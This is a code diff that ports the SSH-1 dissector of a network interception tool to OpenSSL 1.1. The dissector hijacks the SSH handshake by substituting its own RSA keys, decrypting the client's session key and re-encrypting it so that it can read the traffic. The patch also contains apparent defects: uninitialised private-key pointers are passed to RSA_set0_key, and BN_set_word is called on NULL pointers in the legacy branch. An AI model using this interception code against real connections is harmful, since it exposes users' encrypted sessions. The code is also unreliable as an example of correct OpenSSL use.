@@ -36,6 +36,10 @@
 #include <openssl/md5.h>
 #include <zlib.h>
 
+#if (OPENSSL_VERSION_NUMBER >= 0x10100000L)
+#define HAVE_OPAQUE_RSA_DSA_DH 1 /* since 1.1.0 -pre5 */
+#endif
+
 #define SMSG_PUBLIC_KEY 2
 #define CMSG_SESSION_KEY 3
 #define CMSG_USER 4
@@ -59,8 +63,8 @@ typedef struct {
     RSA *myhostkey;
     u_int32 server_mod;
     u_int32 host_mod;
-    u_char server_exp;
-    u_char host_exp;
+    BIGNUM *server_exp;
+    BIGNUM *host_exp;
     struct ssh_my_key *next;
 } ssh_my_key;
 
@@ -138,6 +142,11 @@ FUNC_DECODER(dissector_ssh)
    char tmp[MAX_ASCII_ADDR_LEN];
    u_int32 ssh_len, ssh_mod;
    u_char ssh_packet_type, *ptr, *key_to_put;
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+   BIGNUM *h_n, *s_n, *m_h_n, *m_s_n;
+   BIGNUM *h_e, *s_e, *m_h_e, *m_s_e;
+   BIGNUM *h_d, *s_d, *m_h_d, *m_s_d;
+#endif
 
    /* don't complain about unused var */
    (void) DECODE_DATA; 
@@ -155,14 +164,14 @@ FUNC_DECODER(dissector_ssh)
     * off performs only banner catching.
     */
    
-   if ((!GBL_CONF->aggressive_dissectors || GBL_OPTIONS->unoffensive || GBL_OPTIONS->read) 
+   if ((!EC_GBL_CONF->aggressive_dissectors || EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read) 
          || session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { 
       SAFE_FREE(ident);
       /* Create the session on first server's cleartext packet */
       if(!memcmp(PACKET->DATA.data,"SSH-", 4) && FROM_SERVER("ssh", PACKET)) {
 
          /* Only if we are interested on key substitution */         
-         if (GBL_CONF->aggressive_dissectors && !GBL_OPTIONS->unoffensive && !GBL_OPTIONS->read) {
+         if (EC_GBL_CONF->aggressive_dissectors && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) {
             dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_ssh));
             SAFE_CALLOC(s->data, sizeof(ssh_session_data), 1);
             session_put(s);
@@ -357,7 +366,7 @@ FUNC_DECODER(dissector_ssh)
          if ((session_data->status == WAITING_PUBLIC_KEY || session_data->status == WAITING_SESSION_KEY) && ssh_packet_type == SMSG_PUBLIC_KEY) {
             ssh_my_key **index_ssl;
             u_int32 server_mod, host_mod, cypher_mask, my_mask=0;
-            BN_ULONG server_exp, host_exp;
+            BIGNUM *server_exp = NULL, *host_exp = NULL;
 	     
             /* Set the mask to 3DES or blowfish (if supported) */
             cypher_mask = *(u_int32 *)(PACKET->DATA.data + PACKET->DATA.len - 12);
@@ -383,12 +392,25 @@ FUNC_DECODER(dissector_ssh)
             if (session_data->ptrkey == NULL) { 
                /* Initialize RSA key structures (other fileds are set to 0) */
                session_data->serverkey = RSA_new();
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+               s_n = BN_new();
+               s_e = BN_new();
+               RSA_set0_key(session_data->serverkey, s_n, s_e, s_d);
+#else
                session_data->serverkey->n = BN_new();
                session_data->serverkey->e = BN_new();
+#endif
 
                session_data->hostkey = RSA_new();
+
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+               h_n = BN_new();
+               h_e = BN_new();
+               RSA_set0_key(session_data->hostkey, h_n, h_e, h_d);
+#else
                session_data->hostkey->n = BN_new();
                session_data->hostkey->e = BN_new();
+#endif
 
                /* Get the RSA Key from the packet */
                NS_GET32(server_mod,ptr);
@@ -396,19 +418,39 @@ FUNC_DECODER(dissector_ssh)
                   DEBUG_MSG("Dissector_ssh Bougs Server_Mod");
                   return NULL;
                }
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+               RSA_get0_key(session_data->serverkey, 
+                     (const BIGNUM**)&s_n, (const BIGNUM**)&s_e, (const BIGNUM**)&s_d);
+               get_bn(s_e, &ptr);
+               get_bn(s_n, &ptr);
+#else
                get_bn(session_data->serverkey->e, &ptr);
                get_bn(session_data->serverkey->n, &ptr);
+#endif
 
                NS_GET32(host_mod,ptr);
                if (ptr + (host_mod/8) > PACKET->DATA.data + PACKET->DATA.len) {
                   DEBUG_MSG("Dissector_ssh Bougs Host_Mod");
                   return NULL;
                }
+
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+               RSA_get0_key(session_data->hostkey, 
+                     (const BIGNUM**)&h_n, (const BIGNUM**)&h_e, (const BIGNUM**)&h_d);
+               get_bn(h_e, &ptr);
+               get_bn(h_n, &ptr);
+#else
                get_bn(session_data->hostkey->e, &ptr);
                get_bn(session_data->hostkey->n, &ptr);
+#endif
 
-               server_exp = *(session_data->serverkey->e->d);
-               host_exp   = *(session_data->hostkey->e->d);
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+               server_exp = s_e;
+               host_exp   = h_e;
+#else
+               BN_set_word(server_exp, *(session_data->serverkey->e->d));
+               BN_set_word(host_exp, *(session_data->hostkey->e->d));
+#endif
 
                /* Check if we already have a suitable RSA key to substitute */
                index_ssl = &ssh_conn_key;
@@ -424,17 +466,25 @@ FUNC_DECODER(dissector_ssh)
                   SAFE_CALLOC(*index_ssl, 1, sizeof(ssh_my_key));
 
                   /* Generate the new key */
-                  (*index_ssl)->myserverkey = (RSA *)RSA_generate_key(server_mod, server_exp, NULL, NULL);
-                  (*index_ssl)->myhostkey = (RSA *)RSA_generate_key(host_mod, host_exp, NULL, NULL);
+                  (*index_ssl)->myserverkey = RSA_new();
+                  if (!RSA_generate_key_ex((*index_ssl)->myserverkey,
+                           server_mod, server_exp, NULL)) {
+                     RSA_free((*index_ssl)->myserverkey);
+                     SAFE_FREE(*index_ssl);
+                     return NULL;
+                  }
+                  (*index_ssl)->myhostkey = RSA_new();
+                  if (!RSA_generate_key_ex((*index_ssl)->myhostkey,
+                           host_mod, host_exp, NULL)) {
+                     RSA_free((*index_ssl)->myhostkey);
+                     SAFE_FREE(*index_ssl);
+                     return NULL;
+                  }
                   (*index_ssl)->server_mod = server_mod;
                   (*index_ssl)->host_mod = host_mod;
                   (*index_ssl)->server_exp = server_exp;
                   (*index_ssl)->host_exp = host_exp;		  
                   (*index_ssl)->next = NULL;
-                  if ((*index_ssl)->myserverkey == NULL || (*index_ssl)->myhostkey == NULL) {
-                     SAFE_FREE(*index_ssl);
-                     return NULL;
-                  }
                }
 	    
                /* Assign the key to the session */
@@ -443,11 +493,27 @@ FUNC_DECODER(dissector_ssh)
 
             /* Put our RSA key in the packet */
             key_to_put+=4;
+
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            RSA_get0_key(session_data->ptrkey->myserverkey, 
+                  (const BIGNUM**)&m_s_n, (const BIGNUM**)&m_s_e, (const BIGNUM**)&m_s_d);
+            put_bn(m_s_e, &key_to_put);
+            put_bn(m_s_n, &key_to_put);
+#else
             put_bn(session_data->ptrkey->myserverkey->e, &key_to_put);
             put_bn(session_data->ptrkey->myserverkey->n, &key_to_put);
+#endif
             key_to_put+=4;
+
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            RSA_get0_key(session_data->ptrkey->myhostkey, 
+                  (const BIGNUM**)&m_h_n, (const BIGNUM**)&m_h_e, (const BIGNUM**)&m_h_d);
+            put_bn(m_h_e, &key_to_put);
+            put_bn(m_h_n, &key_to_put);
+#else
             put_bn(session_data->ptrkey->myhostkey->e, &key_to_put);
             put_bn(session_data->ptrkey->myhostkey->n, &key_to_put);
+#endif
 
             /* Recalculate SSH crc */
             *(u_int32 *)(PACKET->DATA.data + PACKET->DATA.len - 4) = htonl(CRC_checksum(PACKET->DATA.data+4, PACKET->DATA.len-8, CRC_INIT_ZERO));
@@ -482,19 +548,34 @@ FUNC_DECODER(dissector_ssh)
             key_to_put = ptr;
 
             /* Calculate real session id and our fake session id */
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            temp_session_id = ssh_session_id(cookie, h_n, s_n);
+#else
             temp_session_id = ssh_session_id(cookie, session_data->hostkey->n, session_data->serverkey->n);
+#endif
             if (temp_session_id)
                memcpy(session_id1, temp_session_id, 16);
+
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            temp_session_id=ssh_session_id(cookie, m_h_n, m_s_n);
+#else
             temp_session_id=ssh_session_id(cookie, session_data->ptrkey->myhostkey->n, session_data->ptrkey->myserverkey->n);
+#endif
+
             if (temp_session_id)
                memcpy(session_id2, temp_session_id, 16);
 
             /* Get the session key */
             enckey = BN_new();
+
             get_bn(enckey, &ptr);
 
             /* Decrypt session key */
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            if (BN_cmp(m_s_n, m_h_n) > 0) {
+#else
             if (BN_cmp(session_data->ptrkey->myserverkey->n, session_data->ptrkey->myhostkey->n) > 0) {
+#endif
               rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myserverkey);
               rsa_private_decrypt(enckey, enckey, session_data->ptrkey->myhostkey);
             } else {
@@ -534,7 +615,11 @@ FUNC_DECODER(dissector_ssh)
                  BN_add_word(bn, sesskey[i]);
             }
 
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+            if (BN_cmp(s_n, h_n) < 0) {
+#else
             if (BN_cmp(session_data->serverkey->n, session_data->hostkey->n) < 0) {
+#endif
                rsa_public_encrypt(bn, bn, session_data->serverkey);
                rsa_public_encrypt(bn, bn, session_data->hostkey);
             } else {
@@ -716,7 +801,16 @@ static void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key)
    u_char *inbuf, *outbuf;
    int32 len, ilen, olen;
 
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+   const BIGNUM *n;
+   const BIGNUM *e;
+   const BIGNUM *d;
+   RSA_get0_key(key, &n, &e, &d);
+   olen = BN_num_bytes(n);
+#else
    olen = BN_num_bytes(key->n);
+#endif
+
    outbuf = malloc(olen);
    if (outbuf == NULL) /* oops, couldn't allocate memory */
       return;
@@ -744,7 +838,16 @@ static void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key)
    u_char *inbuf, *outbuf;
    int32 len, ilen, olen;
 
+#ifdef HAVE_OPAQUE_RSA_DSA_DH
+   const BIGNUM *n;
+   const BIGNUM *e;
+   const BIGNUM *d;
+   RSA_get0_key(key, &n, &e, &d);
+   olen = BN_num_bytes(n);
+#else
    olen = BN_num_bytes(key->n);
+#endif
+
    outbuf = malloc(olen);
    if (outbuf == NULL) /* oops, couldn't allocate memory */
       return;
